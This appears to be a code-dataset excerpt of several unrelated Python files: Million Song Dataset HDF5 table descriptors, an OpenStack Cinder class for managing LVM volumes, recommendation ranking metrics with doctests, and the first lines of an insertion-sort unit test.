judaba13/GenrePredictor | hdf5_descriptors.py | 1 | 3890 | """
This file is used to define classes that hold data for reading from the HDF5 files for MSD
This code was provided by the MSD distributors to read the data.
Thierry Bertin-Mahieux (2010) Columbia University
[email protected]
This code contains descriptors used to create HDF5 files
for the Million Song Database Project.
What information gets in the database should be decided here.
This is part of the Million Song Dataset project from
LabROSA (Columbia University) and The Echo Nest.
Copyright 2010, Thierry Bertin-Mahieux
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
# code relies on pytables, see http://www.pytables.org
import tables
MAXSTRLEN = 1024
class SongMetaData(tables.IsDescription):
"""
Class to hold the metadata of one song
"""
artist_name = tables.StringCol(MAXSTRLEN)
artist_id = tables.StringCol(32)
artist_mbid = tables.StringCol(40)
artist_playmeid = tables.IntCol()
artist_7digitalid = tables.IntCol()
analyzer_version = tables.StringCol(32)
genre = tables.StringCol(MAXSTRLEN)
release = tables.StringCol(MAXSTRLEN)
release_7digitalid = tables.IntCol()
title = tables.StringCol(MAXSTRLEN)
artist_familiarity = tables.Float64Col()
artist_hotttnesss = tables.Float64Col()
song_id = tables.StringCol(32)
song_hotttnesss = tables.Float64Col()
artist_latitude = tables.Float64Col()
artist_longitude = tables.Float64Col()
artist_location = tables.StringCol(MAXSTRLEN)
track_7digitalid = tables.IntCol()
# ARRAY INDICES
idx_similar_artists = tables.IntCol()
idx_artist_terms = tables.IntCol()
# TO ADD
# song mbid
# album mbid
# url
# preview url, 7digital, release_image
class SongAnalysis(tables.IsDescription):
"""
Class to hold the analysis of one song
"""
analysis_sample_rate = tables.IntCol()
audio_md5 = tables.StringCol(32)
danceability = tables.Float64Col()
duration = tables.Float64Col()
end_of_fade_in = tables.Float64Col()
energy = tables.Float64Col()
key = tables.IntCol()
key_confidence = tables.Float64Col()
loudness = tables.Float64Col()
mode = tables.IntCol()
mode_confidence = tables.Float64Col()
start_of_fade_out = tables.Float64Col()
tempo = tables.Float64Col()
time_signature = tables.IntCol()
time_signature_confidence = tables.Float64Col()
track_id = tables.StringCol(32)
# ARRAY INDICES
idx_segments_start = tables.IntCol()
idx_segments_confidence = tables.IntCol()
idx_segments_pitches = tables.IntCol()
idx_segments_timbre = tables.IntCol()
idx_segments_loudness_max = tables.IntCol()
idx_segments_loudness_max_time = tables.IntCol()
idx_segments_loudness_start = tables.IntCol()
idx_sections_start = tables.IntCol()
idx_sections_confidence = tables.IntCol()
idx_beats_start = tables.IntCol()
idx_beats_confidence = tables.IntCol()
idx_bars_start = tables.IntCol()
idx_bars_confidence = tables.IntCol()
idx_tatums_start = tables.IntCol()
idx_tatums_confidence = tables.IntCol()
class SongMusicBrainz(tables.IsDescription):
"""
Class to hold information coming from
MusicBrainz for one song
"""
year = tables.IntCol()
# ARRAY INDEX
idx_artist_mbtags = tables.IntCol() | apache-2.0 | -8,598,590,883,223,135,000 | 34.697248 | 90 | 0.717995 | false |
tobegit3hub/cinder_docker | cinder/brick/local_dev/lvm.py | 1 | 30594 | # Copyright 2013 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
LVM class for performing LVM operations.
"""
import math
import os
import re
from os_brick import executor
from oslo_concurrency import processutils as putils
from oslo_log import log as logging
from oslo_utils import excutils
from six import moves
from cinder import exception
from cinder.i18n import _LE, _LI
from cinder import utils
LOG = logging.getLogger(__name__)
class LVM(executor.Executor):
"""LVM object to enable various LVM related operations."""
LVM_CMD_PREFIX = ['env', 'LC_ALL=C']
def __init__(self, vg_name, root_helper, create_vg=False,
physical_volumes=None, lvm_type='default',
executor=putils.execute, lvm_conf=None):
"""Initialize the LVM object.
The LVM object is based on an LVM VolumeGroup, one instantiation
for each VolumeGroup you have/use.
:param vg_name: Name of existing VG or VG to create
:param root_helper: Execution root_helper method to use
:param create_vg: Indicates the VG doesn't exist
and we want to create it
:param physical_volumes: List of PVs to build VG on
:param lvm_type: VG and Volume type (default, or thin)
:param executor: Execute method to use, None uses common/processutils
"""
super(LVM, self).__init__(execute=executor, root_helper=root_helper)
self.vg_name = vg_name
self.pv_list = []
self.vg_size = 0.0
self.vg_free_space = 0.0
self.vg_lv_count = 0
self.vg_uuid = None
self.vg_thin_pool = None
self.vg_thin_pool_size = 0.0
self.vg_thin_pool_free_space = 0.0
self._supports_snapshot_lv_activation = None
self._supports_lvchange_ignoreskipactivation = None
self.vg_provisioned_capacity = 0.0
# Ensure LVM_SYSTEM_DIR has been added to LVM.LVM_CMD_PREFIX
# before the first LVM command is executed, and use the directory
# where the specified lvm_conf file is located as the value.
if lvm_conf and os.path.isfile(lvm_conf):
lvm_sys_dir = os.path.dirname(lvm_conf)
LVM.LVM_CMD_PREFIX = ['env',
'LC_ALL=C',
'LVM_SYSTEM_DIR=' + lvm_sys_dir]
if create_vg and physical_volumes is not None:
self.pv_list = physical_volumes
try:
self._create_vg(physical_volumes)
except putils.ProcessExecutionError as err:
LOG.exception(_LE('Error creating Volume Group'))
LOG.error(_LE('Cmd :%s'), err.cmd)
LOG.error(_LE('StdOut :%s'), err.stdout)
LOG.error(_LE('StdErr :%s'), err.stderr)
raise exception.VolumeGroupCreationFailed(vg_name=self.vg_name)
if self._vg_exists() is False:
LOG.error(_LE('Unable to locate Volume Group %s'), vg_name)
raise exception.VolumeGroupNotFound(vg_name=vg_name)
# NOTE: we assume that the VG has been activated outside of Cinder
if lvm_type == 'thin':
pool_name = "%s-pool" % self.vg_name
if self.get_volume(pool_name) is None:
try:
self.create_thin_pool(pool_name)
except putils.ProcessExecutionError:
# Maybe we just lost the race against another copy of
# this driver being in init in parallel - e.g.
# cinder-volume and cinder-backup starting in parallel
if self.get_volume(pool_name) is None:
raise
self.vg_thin_pool = pool_name
self.activate_lv(self.vg_thin_pool)
self.pv_list = self.get_all_physical_volumes(root_helper, vg_name)
def _vg_exists(self):
"""Simple check to see if VG exists.
:returns: True if vg specified in object exists, else False
"""
exists = False
cmd = LVM.LVM_CMD_PREFIX + ['vgs', '--noheadings',
'-o', 'name', self.vg_name]
(out, _err) = self._execute(*cmd,
root_helper=self._root_helper,
run_as_root=True)
if out is not None:
volume_groups = out.split()
if self.vg_name in volume_groups:
exists = True
return exists
def _create_vg(self, pv_list):
cmd = ['vgcreate', self.vg_name, ','.join(pv_list)]
self._execute(*cmd, root_helper=self._root_helper, run_as_root=True)
def _get_vg_uuid(self):
cmd = LVM.LVM_CMD_PREFIX + ['vgs', '--noheadings',
'-o', 'uuid', self.vg_name]
(out, _err) = self._execute(*cmd,
root_helper=self._root_helper,
run_as_root=True)
if out is not None:
return out.split()
else:
return []
def _get_thin_pool_free_space(self, vg_name, thin_pool_name):
"""Returns available thin pool free space.
:param vg_name: the vg where the pool is placed
:param thin_pool_name: the thin pool to gather info for
:returns: Free space in GB (float), calculated using data_percent
"""
cmd = LVM.LVM_CMD_PREFIX +\
['lvs', '--noheadings', '--unit=g',
'-o', 'size,data_percent', '--separator',
':', '--nosuffix']
# NOTE(gfidente): data_percent only applies to some types of LV so we
# make sure to append the actual thin pool name
cmd.append("/dev/%s/%s" % (vg_name, thin_pool_name))
free_space = 0.0
try:
(out, err) = self._execute(*cmd,
root_helper=self._root_helper,
run_as_root=True)
if out is not None:
out = out.strip()
data = out.split(':')
pool_size = float(data[0])
data_percent = float(data[1])
consumed_space = pool_size / 100 * data_percent
free_space = pool_size - consumed_space
free_space = round(free_space, 2)
except putils.ProcessExecutionError as err:
LOG.exception(_LE('Error querying thin pool about data_percent'))
LOG.error(_LE('Cmd :%s'), err.cmd)
LOG.error(_LE('StdOut :%s'), err.stdout)
LOG.error(_LE('StdErr :%s'), err.stderr)
return free_space
@staticmethod
def get_lvm_version(root_helper):
"""Static method to get LVM version from system.
:param root_helper: root_helper to use for execute
:returns: version 3-tuple
"""
cmd = LVM.LVM_CMD_PREFIX + ['vgs', '--version']
(out, _err) = putils.execute(*cmd,
root_helper=root_helper,
run_as_root=True)
lines = out.split('\n')
for line in lines:
if 'LVM version' in line:
version_list = line.split()
# NOTE(gfidente): version is formatted as follows:
# major.minor.patchlevel(library API version)[-customisation]
version = version_list[2]
version_filter = r"(\d+)\.(\d+)\.(\d+).*"
r = re.search(version_filter, version)
version_tuple = tuple(map(int, r.group(1, 2, 3)))
return version_tuple
@staticmethod
def supports_thin_provisioning(root_helper):
"""Static method to check for thin LVM support on a system.
:param root_helper: root_helper to use for execute
:returns: True if supported, False otherwise
"""
return LVM.get_lvm_version(root_helper) >= (2, 2, 95)
@property
def supports_snapshot_lv_activation(self):
"""Property indicating whether snap activation changes are supported.
Check for LVM version >= 2.02.91.
(LVM2 git: e8a40f6 Allow to activate snapshot)
:returns: True/False indicating support
"""
if self._supports_snapshot_lv_activation is not None:
return self._supports_snapshot_lv_activation
self._supports_snapshot_lv_activation = (
self.get_lvm_version(self._root_helper) >= (2, 2, 91))
return self._supports_snapshot_lv_activation
@property
def supports_lvchange_ignoreskipactivation(self):
"""Property indicating whether lvchange can ignore skip activation.
Check for LVM version >= 2.02.99.
(LVM2 git: ab789c1bc add --ignoreactivationskip to lvchange)
"""
if self._supports_lvchange_ignoreskipactivation is not None:
return self._supports_lvchange_ignoreskipactivation
self._supports_lvchange_ignoreskipactivation = (
self.get_lvm_version(self._root_helper) >= (2, 2, 99))
return self._supports_lvchange_ignoreskipactivation
@staticmethod
def get_lv_info(root_helper, vg_name=None, lv_name=None):
"""Retrieve info about LVs (all, in a VG, or a single LV).
:param root_helper: root_helper to use for execute
:param vg_name: optional, gathers info for only the specified VG
:param lv_name: optional, gathers info for only the specified LV
:returns: List of Dictionaries with LV info
"""
cmd = LVM.LVM_CMD_PREFIX + ['lvs', '--noheadings', '--unit=g',
'-o', 'vg_name,name,size', '--nosuffix']
if lv_name is not None and vg_name is not None:
cmd.append("%s/%s" % (vg_name, lv_name))
elif vg_name is not None:
cmd.append(vg_name)
try:
(out, _err) = putils.execute(*cmd,
root_helper=root_helper,
run_as_root=True)
except putils.ProcessExecutionError as err:
with excutils.save_and_reraise_exception(reraise=True) as ctx:
if "not found" in err.stderr or "Failed to find" in err.stderr:
ctx.reraise = False
LOG.info(_LI("Logical Volume not found when querying "
"LVM info. (vg_name=%(vg)s, lv_name=%(lv)s"),
{'vg': vg_name, 'lv': lv_name})
out = None
lv_list = []
if out is not None:
volumes = out.split()
iterator = moves.zip(*[iter(volumes)] * 3) # pylint: disable=E1101
for vg, name, size in iterator:
lv_list.append({"vg": vg, "name": name, "size": size})
return lv_list
def get_volumes(self, lv_name=None):
"""Get all LV's associated with this instantiation (VG).
:returns: List of Dictionaries with LV info
"""
return self.get_lv_info(self._root_helper,
self.vg_name,
lv_name)
def get_volume(self, name):
"""Get reference object of volume specified by name.
:returns: dict representation of Logical Volume if exists
"""
ref_list = self.get_volumes(name)
for r in ref_list:
if r['name'] == name:
return r
return None
@staticmethod
def get_all_physical_volumes(root_helper, vg_name=None):
"""Static method to get all PVs on a system.
:param root_helper: root_helper to use for execute
:param vg_name: optional, gathers info for only the specified VG
:returns: List of Dictionaries with PV info
"""
field_sep = '|'
cmd = LVM.LVM_CMD_PREFIX + ['pvs', '--noheadings',
'--unit=g',
'-o', 'vg_name,name,size,free',
'--separator', field_sep,
'--nosuffix']
(out, _err) = putils.execute(*cmd,
root_helper=root_helper,
run_as_root=True)
pvs = out.split()
if vg_name is not None:
pvs = [pv for pv in pvs if vg_name == pv.split(field_sep)[0]]
pv_list = []
for pv in pvs:
fields = pv.split(field_sep)
pv_list.append({'vg': fields[0],
'name': fields[1],
'size': float(fields[2]),
'available': float(fields[3])})
return pv_list
def get_physical_volumes(self):
"""Get all PVs associated with this instantiation (VG).
:returns: List of Dictionaries with PV info
"""
self.pv_list = self.get_all_physical_volumes(self._root_helper,
self.vg_name)
return self.pv_list
@staticmethod
def get_all_volume_groups(root_helper, vg_name=None):
"""Static method to get all VGs on a system.
:param root_helper: root_helper to use for execute
:param vg_name: optional, gathers info for only the specified VG
:returns: List of Dictionaries with VG info
"""
cmd = LVM.LVM_CMD_PREFIX + ['vgs', '--noheadings',
'--unit=g', '-o',
'name,size,free,lv_count,uuid',
'--separator', ':',
'--nosuffix']
if vg_name is not None:
cmd.append(vg_name)
(out, _err) = putils.execute(*cmd,
root_helper=root_helper,
run_as_root=True)
vg_list = []
if out is not None:
vgs = out.split()
for vg in vgs:
fields = vg.split(':')
vg_list.append({'name': fields[0],
'size': float(fields[1]),
'available': float(fields[2]),
'lv_count': int(fields[3]),
'uuid': fields[4]})
return vg_list
def update_volume_group_info(self):
"""Update VG info for this instantiation.
Used to update member fields of object and
provide a dict of info for caller.
:returns: Dictionaries of VG info
"""
vg_list = self.get_all_volume_groups(self._root_helper, self.vg_name)
if len(vg_list) != 1:
LOG.error(_LE('Unable to find VG: %s'), self.vg_name)
raise exception.VolumeGroupNotFound(vg_name=self.vg_name)
self.vg_size = float(vg_list[0]['size'])
self.vg_free_space = float(vg_list[0]['available'])
self.vg_lv_count = int(vg_list[0]['lv_count'])
self.vg_uuid = vg_list[0]['uuid']
total_vols_size = 0.0
if self.vg_thin_pool is not None:
# NOTE(xyang): If providing only self.vg_name,
# get_lv_info will output info on the thin pool and all
# individual volumes.
# get_lv_info(self._root_helper, 'stack-vg')
# sudo lvs --noheadings --unit=g -o vg_name,name,size
# --nosuffix stack-vg
# stack-vg stack-pool 9.51
# stack-vg volume-13380d16-54c3-4979-9d22-172082dbc1a1 1.00
# stack-vg volume-629e13ab-7759-46a5-b155-ee1eb20ca892 1.00
# stack-vg volume-e3e6281c-51ee-464c-b1a7-db6c0854622c 1.00
#
# If providing both self.vg_name and self.vg_thin_pool,
# get_lv_info will output only info on the thin pool, but not
# individual volumes.
# get_lv_info(self._root_helper, 'stack-vg', 'stack-pool')
# sudo lvs --noheadings --unit=g -o vg_name,name,size
# --nosuffix stack-vg/stack-pool
# stack-vg stack-pool 9.51
#
# We need info on both the thin pool and the volumes,
# therefore we should provide only self.vg_name, but not
# self.vg_thin_pool here.
for lv in self.get_lv_info(self._root_helper,
self.vg_name):
lvsize = lv['size']
# get_lv_info runs "lvs" command with "--nosuffix".
# This removes "g" from "1.00g" and only outputs "1.00".
# Running "lvs" command without "--nosuffix" will output
# "1.00g" if "g" is the unit.
# Remove the unit if it is in lv['size'].
if not lv['size'][-1].isdigit():
lvsize = lvsize[:-1]
if lv['name'] == self.vg_thin_pool:
self.vg_thin_pool_size = lvsize
tpfs = self._get_thin_pool_free_space(self.vg_name,
self.vg_thin_pool)
self.vg_thin_pool_free_space = tpfs
else:
total_vols_size = total_vols_size + float(lvsize)
total_vols_size = round(total_vols_size, 2)
self.vg_provisioned_capacity = total_vols_size
def _calculate_thin_pool_size(self):
"""Calculates the correct size for a thin pool.
Ideally we would use 100% of the containing volume group and be done.
But the 100%VG notation to lvcreate is not implemented and thus cannot
be used. See https://bugzilla.redhat.com/show_bug.cgi?id=998347
Further, some amount of free space must remain in the volume group for
metadata for the contained logical volumes. The exact amount depends
on how much volume sharing you expect.
:returns: An lvcreate-ready string for the number of calculated bytes.
"""
# make sure volume group information is current
self.update_volume_group_info()
# leave 5% free for metadata
return "%sg" % (self.vg_free_space * 0.95)
def create_thin_pool(self, name=None, size_str=None):
"""Creates a thin provisioning pool for this VG.
The syntax here is slightly different than the default
lvcreate -T, so we'll just write a custom cmd here
and do it.
:param name: Name to use for pool, default is "<vg-name>-pool"
:param size_str: Size to allocate for pool, default is entire VG
:returns: The size string passed to the lvcreate command
"""
if not self.supports_thin_provisioning(self._root_helper):
LOG.error(_LE('Requested to setup thin provisioning, '
'however current LVM version does not '
'support it.'))
return None
if name is None:
name = '%s-pool' % self.vg_name
vg_pool_name = '%s/%s' % (self.vg_name, name)
if not size_str:
size_str = self._calculate_thin_pool_size()
cmd = ['lvcreate', '-T', '-L', size_str, vg_pool_name]
LOG.debug("Creating thin pool '%(pool)s' with size %(size)s of "
"total %(free)sg", {'pool': vg_pool_name,
'size': size_str,
'free': self.vg_free_space})
self._execute(*cmd,
root_helper=self._root_helper,
run_as_root=True)
self.vg_thin_pool = name
return size_str
def create_volume(self, name, size_str, lv_type='default', mirror_count=0):
"""Creates a logical volume on the object's VG.
:param name: Name to use when creating Logical Volume
:param size_str: Size to use when creating Logical Volume
:param lv_type: Type of Volume (default or thin)
:param mirror_count: Use LVM mirroring with specified count
"""
if lv_type == 'thin':
pool_path = '%s/%s' % (self.vg_name, self.vg_thin_pool)
cmd = ['lvcreate', '-T', '-V', size_str, '-n', name, pool_path]
else:
cmd = ['lvcreate', '-n', name, self.vg_name, '-L', size_str]
if mirror_count > 0:
cmd.extend(['-m', mirror_count, '--nosync',
'--mirrorlog', 'mirrored'])
terras = int(size_str[:-1]) / 1024.0
if terras >= 1.5:
rsize = int(2 ** math.ceil(math.log(terras) / math.log(2)))
# NOTE(vish): Next power of two for region size. See:
# http://red.ht/U2BPOD
cmd.extend(['-R', str(rsize)])
try:
self._execute(*cmd,
root_helper=self._root_helper,
run_as_root=True)
except putils.ProcessExecutionError as err:
LOG.exception(_LE('Error creating Volume'))
LOG.error(_LE('Cmd :%s'), err.cmd)
LOG.error(_LE('StdOut :%s'), err.stdout)
LOG.error(_LE('StdErr :%s'), err.stderr)
raise
@utils.retry(putils.ProcessExecutionError)
def create_lv_snapshot(self, name, source_lv_name, lv_type='default'):
"""Creates a snapshot of a logical volume.
:param name: Name to assign to new snapshot
:param source_lv_name: Name of Logical Volume to snapshot
:param lv_type: Type of LV (default or thin)
"""
source_lvref = self.get_volume(source_lv_name)
if source_lvref is None:
LOG.error(_LE("Trying to create snapshot by non-existent LV: %s"),
source_lv_name)
raise exception.VolumeDeviceNotFound(device=source_lv_name)
cmd = ['lvcreate', '--name', name,
'--snapshot', '%s/%s' % (self.vg_name, source_lv_name)]
if lv_type != 'thin':
size = source_lvref['size']
cmd.extend(['-L', '%sg' % (size)])
try:
self._execute(*cmd,
root_helper=self._root_helper,
run_as_root=True)
except putils.ProcessExecutionError as err:
LOG.exception(_LE('Error creating snapshot'))
LOG.error(_LE('Cmd :%s'), err.cmd)
LOG.error(_LE('StdOut :%s'), err.stdout)
LOG.error(_LE('StdErr :%s'), err.stderr)
raise
def _mangle_lv_name(self, name):
# Linux LVM reserves name that starts with snapshot, so that
# such volume name can't be created. Mangle it.
if not name.startswith('snapshot'):
return name
return '_' + name
def deactivate_lv(self, name):
lv_path = self.vg_name + '/' + self._mangle_lv_name(name)
cmd = ['lvchange', '-a', 'n']
cmd.append(lv_path)
try:
self._execute(*cmd,
root_helper=self._root_helper,
run_as_root=True)
except putils.ProcessExecutionError as err:
LOG.exception(_LE('Error deactivating LV'))
LOG.error(_LE('Cmd :%s'), err.cmd)
LOG.error(_LE('StdOut :%s'), err.stdout)
LOG.error(_LE('StdErr :%s'), err.stderr)
raise
def activate_lv(self, name, is_snapshot=False, permanent=False):
"""Ensure that logical volume/snapshot logical volume is activated.
:param name: Name of LV to activate
:param is_snapshot: whether LV is a snapshot
:param permanent: whether we should drop skipactivation flag
:raises: putils.ProcessExecutionError
"""
# This is a no-op if requested for a snapshot on a version
# of LVM that doesn't support snapshot activation.
# (Assume snapshot LV is always active.)
if is_snapshot and not self.supports_snapshot_lv_activation:
return
lv_path = self.vg_name + '/' + self._mangle_lv_name(name)
# Must pass --yes to activate both the snap LV and its origin LV.
# Otherwise lvchange asks if you would like to do this interactively,
# and fails.
cmd = ['lvchange', '-a', 'y', '--yes']
if self.supports_lvchange_ignoreskipactivation:
cmd.append('-K')
# If permanent=True is specified, drop the skipactivation flag in
# order to make this LV automatically activated after next reboot.
if permanent:
cmd += ['-k', 'n']
cmd.append(lv_path)
try:
self._execute(*cmd,
root_helper=self._root_helper,
run_as_root=True)
except putils.ProcessExecutionError as err:
LOG.exception(_LE('Error activating LV'))
LOG.error(_LE('Cmd :%s'), err.cmd)
LOG.error(_LE('StdOut :%s'), err.stdout)
LOG.error(_LE('StdErr :%s'), err.stderr)
raise
@utils.retry(putils.ProcessExecutionError)
def delete(self, name):
"""Delete logical volume or snapshot.
:param name: Name of LV to delete
"""
def run_udevadm_settle():
self._execute('udevadm', 'settle',
root_helper=self._root_helper, run_as_root=True,
check_exit_code=False)
# LV removal seems to be a race with other writers or udev in
# some cases (see LP #1270192), so we enable retry deactivation
LVM_CONFIG = 'activation { retry_deactivation = 1} '
try:
self._execute(
'lvremove',
'--config', LVM_CONFIG,
'-f',
'%s/%s' % (self.vg_name, name),
root_helper=self._root_helper, run_as_root=True)
except putils.ProcessExecutionError as err:
LOG.debug('Error reported running lvremove: CMD: %(command)s, '
'RESPONSE: %(response)s',
{'command': err.cmd, 'response': err.stderr})
LOG.debug('Attempting udev settle and retry of lvremove...')
run_udevadm_settle()
# The previous failing lvremove -f might leave behind
# suspended devices; when lvmetad is not available, any
# further lvm command will block forever.
# Therefore we need to skip suspended devices on retry.
LVM_CONFIG += 'devices { ignore_suspended_devices = 1}'
self._execute(
'lvremove',
'--config', LVM_CONFIG,
'-f',
'%s/%s' % (self.vg_name, name),
root_helper=self._root_helper, run_as_root=True)
LOG.debug('Successfully deleted volume: %s after '
'udev settle.', name)
def revert(self, snapshot_name):
"""Revert an LV from snapshot.
:param snapshot_name: Name of snapshot to revert
"""
self._execute('lvconvert', '--merge',
snapshot_name, root_helper=self._root_helper,
run_as_root=True)
def lv_has_snapshot(self, name):
cmd = LVM.LVM_CMD_PREFIX + ['lvdisplay', '--noheading', '-C', '-o',
'Attr', '%s/%s' % (self.vg_name, name)]
out, _err = self._execute(*cmd,
root_helper=self._root_helper,
run_as_root=True)
if out:
out = out.strip()
if (out[0] == 'o') or (out[0] == 'O'):
return True
return False
def extend_volume(self, lv_name, new_size):
"""Extend the size of an existing volume."""
# Volumes with snaps have attributes 'o' or 'O' and will be
# deactivated, but Thin Volumes with snaps have attribute 'V'
# and won't be deactivated because the lv_has_snapshot method looks
# for 'o' or 'O'
if self.lv_has_snapshot(lv_name):
self.deactivate_lv(lv_name)
try:
self._execute('lvextend', '-L', new_size,
'%s/%s' % (self.vg_name, lv_name),
root_helper=self._root_helper,
run_as_root=True)
except putils.ProcessExecutionError as err:
LOG.exception(_LE('Error extending Volume'))
LOG.error(_LE('Cmd :%s'), err.cmd)
LOG.error(_LE('StdOut :%s'), err.stdout)
LOG.error(_LE('StdErr :%s'), err.stderr)
raise
def vg_mirror_free_space(self, mirror_count):
free_capacity = 0.0
disks = []
for pv in self.pv_list:
disks.append(float(pv['available']))
while True:
disks = sorted([a for a in disks if a > 0.0], reverse=True)
if len(disks) <= mirror_count:
break
# consume the smallest disk
disk = disks[-1]
disks = disks[:-1]
# match extents for each mirror on the largest disks
for index in list(range(mirror_count)):
disks[index] -= disk
free_capacity += disk
return free_capacity
def vg_mirror_size(self, mirror_count):
return (self.vg_free_space / (mirror_count + 1))
def rename_volume(self, lv_name, new_name):
"""Change the name of an existing volume."""
try:
self._execute('lvrename', self.vg_name, lv_name, new_name,
root_helper=self._root_helper,
run_as_root=True)
except putils.ProcessExecutionError as err:
LOG.exception(_LE('Error renaming logical volume'))
LOG.error(_LE('Cmd :%s'), err.cmd)
LOG.error(_LE('StdOut :%s'), err.stdout)
LOG.error(_LE('StdErr :%s'), err.stderr)
raise
| apache-2.0 | 6,120,542,646,678,303,000 | 38.223077 | 79 | 0.532915 | false |
halflings/receval | receval/metrics.py | 1 | 6033 | """
Metrics used to evaluate recommendations.
Shamelessly copied from bwhite's gist:
https://gist.github.com/bwhite/3726239
"""
import numpy as np
def reciprocal_rank(r):
"""Score is reciprocal of the rank of the first relevant item
First element is 'rank 1'. Relevance is binary (nonzero is relevant).
"""
r = np.asarray(r).nonzero()[0]
return 1. / (r[0] + 1) if r.size else 0.
def mean_reciprocal_rank(rs):
"""Mean of the reciprocal rank
Example from http://en.wikipedia.org/wiki/Mean_reciprocal_rank
>>> rs = [[0, 0, 1], [0, 1, 0], [1, 0, 0]]
>>> mean_reciprocal_rank(rs)
0.61111111111111105
>>> rs = np.array([[0, 0, 0], [0, 1, 0], [1, 0, 0]])
>>> mean_reciprocal_rank(rs)
0.5
>>> rs = [[0, 0, 0, 1], [1, 0, 0], [1, 0, 0]]
>>> mean_reciprocal_rank(rs)
0.75
Args:
rs: Iterator of relevance scores (list or numpy) in rank order
(first element is the first item)
Returns:
Mean reciprocal rank
"""
return np.mean([reciprocal_rank(r) for r in rs])
def r_precision(r):
"""Score is precision after all relevant documents have been retrieved
Relevance is binary (nonzero is relevant).
>>> r = [0, 0, 1]
>>> r_precision(r)
0.33333333333333331
>>> r = [0, 1, 0]
>>> r_precision(r)
0.5
>>> r = [1, 0, 0]
>>> r_precision(r)
1.0
Args:
r: Relevance scores (list or numpy) in rank order
(first element is the first item)
Returns:
R Precision
"""
r = np.asarray(r) != 0
z = r.nonzero()[0]
if not z.size:
return 0.
return np.mean(r[:z[-1] + 1])
def precision_at_k(r, k):
"""Score is precision @ k
Relevance is binary (nonzero is relevant).
>>> r = [0, 0, 1]
>>> precision_at_k(r, 1)
0.0
>>> precision_at_k(r, 2)
0.0
>>> precision_at_k(r, 3)
0.33333333333333331
>>> precision_at_k(r, 4)
Traceback (most recent call last):
File "<stdin>", line 1, in ?
ValueError: Relevance score length < k
Args:
r: Relevance scores (list or numpy) in rank order
(first element is the first item)
Returns:
Precision @ k
Raises:
ValueError: len(r) must be >= k
"""
assert k >= 1
r = np.asarray(r)[:k] != 0
if r.size != k:
raise ValueError('Relevance score length < k')
return np.mean(r)
def average_precision(r):
"""Score is average precision (area under PR curve)
Relevance is binary (nonzero is relevant).
>>> r = [1, 1, 0, 1, 0, 1, 0, 0, 0, 1]
>>> delta_r = 1. / sum(r)
>>> sum([sum(r[:x + 1]) / (x + 1.) * delta_r for x, y in enumerate(r) if y])
0.7833333333333333
>>> average_precision(r)
0.78333333333333333
Args:
r: Relevance scores (list or numpy) in rank order
(first element is the first item)
Returns:
Average precision
"""
r = np.asarray(r) != 0
out = [precision_at_k(r, k + 1) for k in range(r.size) if r[k]]
if not out:
return 0.
return np.mean(out)
def mean_average_precision(rs):
"""Score is mean average precision
Relevance is binary (nonzero is relevant).
>>> rs = [[1, 1, 0, 1, 0, 1, 0, 0, 0, 1]]
>>> mean_average_precision(rs)
0.78333333333333333
>>> rs = [[1, 1, 0, 1, 0, 1, 0, 0, 0, 1], [0]]
>>> mean_average_precision(rs)
0.39166666666666666
Args:
rs: Iterator of relevance scores (list or numpy) in rank order
(first element is the first item)
Returns:
Mean average precision
"""
return np.mean([average_precision(r) for r in rs])
def dcg_at_k(r, k, method=0):
"""Score is discounted cumulative gain (dcg)
Relevance is positive real values. Can use binary
as the previous methods.
Example from
http://www.stanford.edu/class/cs276/handouts/EvaluationNew-handout-6-per.pdf
>>> r = [3, 2, 3, 0, 0, 1, 2, 2, 3, 0]
>>> dcg_at_k(r, 1)
3.0
>>> dcg_at_k(r, 1, method=1)
3.0
>>> dcg_at_k(r, 2)
5.0
>>> dcg_at_k(r, 2, method=1)
4.2618595071429155
>>> dcg_at_k(r, 10)
9.6051177391888114
>>> dcg_at_k(r, 11)
9.6051177391888114
Args:
r: Relevance scores (list or numpy) in rank order
(first element is the first item)
k: Number of results to consider
method: If 0 then weights are [1.0, 1.0, 0.6309, 0.5, 0.4307, ...]
If 1 then weights are [1.0, 0.6309, 0.5, 0.4307, ...]
Returns:
Discounted cumulative gain
"""
r = np.asfarray(r)[:k]
if r.size:
if method == 0:
return r[0] + np.sum(r[1:] / np.log2(np.arange(2, r.size + 1)))
elif method == 1:
return np.sum(r / np.log2(np.arange(2, r.size + 2)))
else:
raise ValueError('method must be 0 or 1.')
return 0.
def ndcg_at_k(r, k, method=0):
"""Score is normalized discounted cumulative gain (ndcg)
Relevance is positive real values. Can use binary
as the previous methods.
Example from
http://www.stanford.edu/class/cs276/handouts/EvaluationNew-handout-6-per.pdf
>>> r = [3, 2, 3, 0, 0, 1, 2, 2, 3, 0]
>>> ndcg_at_k(r, 1)
1.0
>>> r = [2, 1, 2, 0]
>>> ndcg_at_k(r, 4)
0.9203032077642922
>>> ndcg_at_k(r, 4, method=1)
0.96519546960144276
>>> ndcg_at_k([0], 1)
0.0
>>> ndcg_at_k([1], 2)
1.0
Args:
r: Relevance scores (list or numpy) in rank order
(first element is the first item)
k: Number of results to consider
method: If 0 then weights are [1.0, 1.0, 0.6309, 0.5, 0.4307, ...]
If 1 then weights are [1.0, 0.6309, 0.5, 0.4307, ...]
Returns:
Normalized discounted cumulative gain
"""
dcg_max = dcg_at_k(sorted(r, reverse=True), k, method)
if not dcg_max:
return 0.
return dcg_at_k(r, k, method) / dcg_max
if __name__ == "__main__":
import doctest
doctest.testmod()
| apache-2.0 | 4,105,317,374,910,143,000 | 27.323944 | 80 | 0.557931 | false |
weichen2046/algorithm-study | algorithms/python/test/unit/sorting/test_insertion_sort.py | 1 | 1255 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import unittest
from utils.read_data_file import read_int_array
from sorting.insertion_sort import sort
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
